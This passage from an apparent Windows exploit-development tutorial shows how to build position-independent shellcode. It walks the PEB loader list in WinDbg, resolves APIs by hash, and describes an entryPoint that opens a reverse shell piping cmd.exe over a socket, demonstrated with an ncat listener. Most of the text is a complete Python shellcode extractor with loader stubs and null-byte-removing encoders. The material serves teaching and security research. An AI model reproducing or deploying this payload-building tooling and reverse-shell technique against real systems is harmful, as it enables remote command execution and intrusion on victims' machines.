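Those offsets can be double-checked by declaring the beginning of the structure with Python 3's ctypes, modeling every 32-bit pointer as c_uint32. This sketch covers only the first few fields from the dump:

```python
import ctypes

class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [('Flink', ctypes.c_uint32), ('Blink', ctypes.c_uint32)]

class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    # First fields of _LDR_DATA_TABLE_ENTRY as shown by WinDbg (32-bit process).
    _fields_ = [
        ('InLoadOrderLinks', LIST_ENTRY32),
        ('InMemoryOrderLinks', LIST_ENTRY32),
        ('InInitializationOrderLinks', LIST_ENTRY32),
        ('DllBase', ctypes.c_uint32),
        ('EntryPoint', ctypes.c_uint32),
        ('SizeOfImage', ctypes.c_uint32),
    ]

def entry_from_in_memory_link(link_address):
    """Same computation as getDataTableEntry(): subtract the field's offset."""
    return link_address - LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset

print(LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset)  # 8
print(hex(LDR_DATA_TABLE_ENTRY32.DllBase.offset))         # 0x18
print(hex(entry_from_in_memory_link(0x683088)))           # 0x683080
```

The input 0x683088 is the Flink of InMemoryOrderModuleList from the PEB_LDR_DATA dump above.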

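First, we get the Flink pointer of InMemoryOrderModuleList:

+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]

Its value is 0x683088, so the _LDR_DATA_TABLE_ENTRY structure is at 0x683088 – 8 = 0x683080. Note that the dump below was taken at 0x683078 instead, i.e. 8 bytes too low. That address comes from subtracting 8 from 0x683080, the Flink of InLoadOrderModuleList, which already points to offset 0 of the entry and needs no adjustment. As a result, every field below appears 8 bytes away from its real position. For example, the real InLoadOrderLinks shows up as InMemoryOrderLinks. The real DllBase (0x00060000, the same value as ImageBaseAddress in the PEB) shows up as SizeOfImage, and the real FullDllName shows up as BaseDllName: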

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮m쿟ᄍ엘ᆲ膪n???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

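As you can see, I'm debugging calc.exe in WinDbg! That's right: the first module is the executable itself. The important field is DllBase. Given the base address of a module, we can analyze the PE file loaded in memory and extract all kinds of information, such as the addresses of the exported functions. That's exactly what we do in getProcAddrByHash: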

 

    BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);
 
    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .

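To fully understand this code you should be familiar with the PE file format specification; I won't go into details here. One thing to keep in mind is that many fields in the PE structures are RVAs (Relative Virtual Addresses), i.e. addresses relative to the base address of the PE module (DllBase). For example, if an RVA is 100h and DllBase is 400000h, the RVA points to the data at 400000h + 100h = 400100h.

The module starts with the DOS_HEADER, which contains the RVA (e_lfanew) of the NT_HEADERS. The NT_HEADERS contain the FILE_HEADER and the OPTIONAL_HEADER. The OPTIONAL_HEADER contains an array called DataDirectory, which points to the various directories of the PE module. For details about the Export Directory, see https://msdn.microsoft.com/en-us/library/ms809762.aspx.

The Export Directory is described by the following C struct: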

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
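The Python 3 sketch below ties these pieces together. It performs the same walk as getProcAddrByHash on a tiny fake PE image built in memory, and it rests on a few assumptions:

* It assumes a PE32 image, so DataDirectory starts 4 + 20 + 96 bytes into the NT headers, i.e. at e_lfanew + 78h.
* It compares names directly instead of hashes.
* It ignores forwarders.
* build_fake_image and find_export are hypothetical helpers.

As in the C code, the value read from AddressOfNameOrdinals is already an index into AddressOfFunctions (Base is not involved):

```python
import struct

EXPORT_DIR_FORMAT = '<IIHHIIIIIII'     # IMAGE_EXPORT_DIRECTORY, 40 bytes
DATA_DIRECTORY_OFFSET = 4 + 20 + 96    # signature + FILE_HEADER + PE32 OPTIONAL_HEADER fields

def export_directory_rva(image):
    """Follow e_lfanew to the NT headers and read DataDirectory[EXPORT].VirtualAddress."""
    e_lfanew = struct.unpack_from('<I', image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    return struct.unpack_from('<I', image, e_lfanew + DATA_DIRECTORY_OFFSET)[0]

def c_string(image, rva):
    return bytes(image[rva:image.index(b'\0', rva)]).decode('ascii')

def find_export(image, wanted):
    """Return the RVA of the exported function named wanted, or None."""
    ied_rva = export_directory_rva(image)
    if ied_rva == 0:
        return None                                  # no export directory
    fields = struct.unpack_from(EXPORT_DIR_FORMAT, image, ied_rva)
    number_of_names = fields[7]
    functions_rva, names_rva, ordinals_rva = fields[8:11]
    for i in range(number_of_names):
        name_rva = struct.unpack_from('<I', image, names_rva + 4 * i)[0]
        if c_string(image, name_rva) == wanted:
            ordinal = struct.unpack_from('<H', image, ordinals_rva + 2 * i)[0]
            return struct.unpack_from('<I', image, functions_rva + 4 * ordinal)[0]
    return None

def build_fake_image():
    """A 1 KB image with just enough structure for find_export()."""
    image = bytearray(0x400)
    image[0:2] = b'MZ'
    struct.pack_into('<I', image, 0x3C, 0x80)                     # e_lfanew
    image[0x80:0x84] = b'PE\0\0'
    struct.pack_into('<II', image, 0x80 + DATA_DIRECTORY_OFFSET, 0x100, 40)
    struct.pack_into(EXPORT_DIR_FORMAT, image, 0x100,
                     0, 0, 0, 0, 0x300, 1, 2, 2, 0x200, 0x210, 0x220)
    struct.pack_into('<II', image, 0x200, 0x1000, 0x2000)         # AddressOfFunctions
    struct.pack_into('<II', image, 0x210, 0x310, 0x320)           # AddressOfNames
    struct.pack_into('<HH', image, 0x220, 1, 0)                   # AddressOfNameOrdinals
    image[0x300:0x309] = b'fake.dll\0'
    image[0x310:0x316] = b'Alpha\0'
    image[0x320:0x325] = b'Beta\0'
    return image

image = build_fake_image()
print(hex(find_export(image, 'Alpha')), hex(find_export(image, 'Beta')))  # 0x2000 0x1000
```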

DefineFuncPtr

DefineFuncPtr is a macro that helps define a pointer to an imported function. Here's an example:

#define HASH_WSAStartup           0x2ddcd540
 
#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
DefineFuncPtr(WSAStartup);

WSAStartup is imported from ws2_32.dll, so HASH_WSAStartup is computed this way:

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");

When the macro is expanded,

DefineFuncPtr(WSAStartup);

becomes

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

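decltype(WSAStartup) is the type of the function WSAStartup. This way we don't need to redefine the function prototype. Note that decltype was introduced in C++11.

Now we can call WSAStartup through My_WSAStartup.

Note that before importing a function from a module, we need to make sure that the module is already loaded in memory.

The easiest way to do that is to load the module with LoadLibrary.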

DefineFuncPtr(LoadLibraryA);
My_LoadLibraryA("ws2_32.dll");

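This works because LoadLibrary is exported by kernel32.dll, which is always loaded in memory.

We could also import GetProcAddress and use it to get the addresses of all the other functions we need. That would be wasteful, though, because we would have to include the full names of those functions in the shellcode.

entryPoint

entryPoint is, obviously, the entry point of our shellcode, and it implements the reverse shell. First we import all the functions we need, and then we use them. The details aren't important, and I have to say that the winsock API is quite cumbersome to use.

In a nutshell:

1. create a socket,

2. connect the socket to 127.0.0.1:123,

3. create a process that runs cmd.exe,

4. attach the socket to the standard input, output and error of the process,

5. wait for the process to terminate,

6. when the process has terminated, terminate the current thread.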

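Points 3 and 4 happen together, in the single call to CreateProcess. As a result, an attacker can listen on port 123 and, once the connection is established, interact through the socket (i.e. the TCP connection) with the cmd.exe running on the remote machine.

To try it, install ncat, run cmd and enter:

ncat -lvp 123

This starts listening on port 123.

Then go back to Visual Studio 2013, select Release, build the project and run it. Back in ncat, you should see something like this: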

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

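Now you can run any command you like. To exit, type exit.

main

Thanks to the linker option

Function Order: function_order.txt

and the fact that the first and only line of function_order.txt is ?entryPoint@@YAHXZ, the function entryPoint is placed first in the shellcode.

Apart from that, the linker follows the order of the functions in the source code, so entryPoint can appear anywhere in the source. main is the last function in the source, so it is linked at the end of the shellcode. We'll see how this is used when we describe the map file.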
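entryPoint starts at offset 0 of the code section and main is the last function linked. The offset of _main inside that section therefore equals the length of the shellcode, and get_shellcode_len() in the script below reads it from the map file. Here is just the parsing step, as a Python 3 sketch. It uses the map-line format quoted in the script's comments, and the function name is hypothetical:

```python
def main_offset_from_map_line(line):
    """Return the section offset of _main from a map-file symbol line, or None."""
    parts = line.split()
    if len(parts) > 2 and parts[1] == '_main':
        section_and_offset = parts[0]           # e.g. '0001:00000274'
        return int(section_and_offset.split(':')[1], 16)
    return None

line = '0001:00000274  _main   00401274 f   shellcode.obj'
print(hex(main_offset_from_map_line(line)))  # 0x274
```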

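0x02 Python Script

Introduction

Now that the executable containing the shellcode is ready, we need a way to extract and fix the shellcode. This isn't easy, so I wrote a Python script that:

1. extracts the shellcode,

2. handles the relocations for the strings,

3. fixes the shellcode by removing null bytes.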
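One common way to get rid of null bytes is XOR encoding with a key byte that never occurs in the shellcode. If key never occurs, then b ^ key can never be 0. The script's get_fixed_shellcode_single_block() starts the same way, by looking for a non-null byte value absent from the shellcode. Below is a minimal Python 3 sketch of just the encoding step, with hypothetical names. A real shellcode would also need a null-free decoder stub in front of the encoded bytes:

```python
def xor_encode(shellcode):
    """Return (key, encoded) where key is a non-zero byte absent from shellcode,
    or None if every non-zero byte value occurs in it."""
    present = set(shellcode)
    for key in range(1, 256):
        if key not in present:
            return key, bytes(b ^ key for b in shellcode)
    return None

def xor_decode(key, encoded):
    """XOR is its own inverse, so decoding uses the same key."""
    return bytes(b ^ key for b in encoded)

code = bytes.fromhex('C7 05 30 91 8E 00 0C 00 00 00')
key, encoded = xor_encode(code)
print(key, encoded.hex())  # 1 c60431908f010d010101
```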

I use PyCharm.

The script is only 392 lines long, but it's a bit tricky, so I'll explain it. Here's the code:

# Shellcode extractor by Massimiliano Tomassoli (2015)
 
import sys
import os
import datetime
import pefile
 
author = 'Massimiliano Tomassoli'
year = datetime.date.today().year
 
 
def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]
 
 
def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)
 
 
def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]
 
 
def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
 
 
def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
 
        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries:
                if entry.type == 0:                     # IMAGE_REL_BASED_ABSOLUTE: padding entry, not a relocation
                    continue
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)
 
    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None
 
 
def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])
 
 
def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)
 
 
def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)
 
 
def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y doesn't contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    '''
 
    # Finds a non-null missing bytes.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]
 
    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)
 
 
def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))
 
 
def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
 
    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])
 
    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) // 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('\0', missing_char))
        pos += num_bytes
 
    return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)
 
 
def main():
    print("Shellcode Extractor by %s (%d)\n" % (author, year))
 
    if len(sys.argv) != 3:
        print('Usage:\n' +
              '  %s <exe file> <map file>\n' % os.path.basename(sys.argv[0]))
        return
 
    exe_file = sys.argv[1]
    map_file = sys.argv[2]
 
    print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print('shellcode length: %d' % shellcode_len)
 
    print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result
 
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
 
    if shellcode.find('\0') == -1:
        print('Unbelievable: the shellcode does not need to be fixed!')
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print('Fixing the shellcode...')
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn't fixed...
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print('[!] Cannot fix the shellcode')
                return
 
    print('final shellcode length: %d\n' % len(fixed_shellcode))
    print('char shellcode[] = ')
    dump_shellcode(fixed_shellcode)
 
 
main()

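Map file and shellcode length

We tell the linker to generate a map file with the following options:

  • Debugging:

    • Generate Map File: Yes (/MAP)

      Tells the linker to generate a map file containing the structure of the EXE.

    • Map File Name: mapfile

The map file is mainly used to determine the length of the shellcode.

Here's the relevant part of the map file: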

shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>

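From the beginning of the map file we learn that section 1 is the .text section, which contains the code:

Start         Length     Name                   Class
0001:00000000 00000a9cH .text$mn                CODE

The second part shows that the .text section starts with ?entryPoint@@YAHXZ, our entryPoint function, and that main (called _main here) is the last of our functions. Since main is at offset 0x266 and entryPoint is at offset 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.

Here's how we do it in Python: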

def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
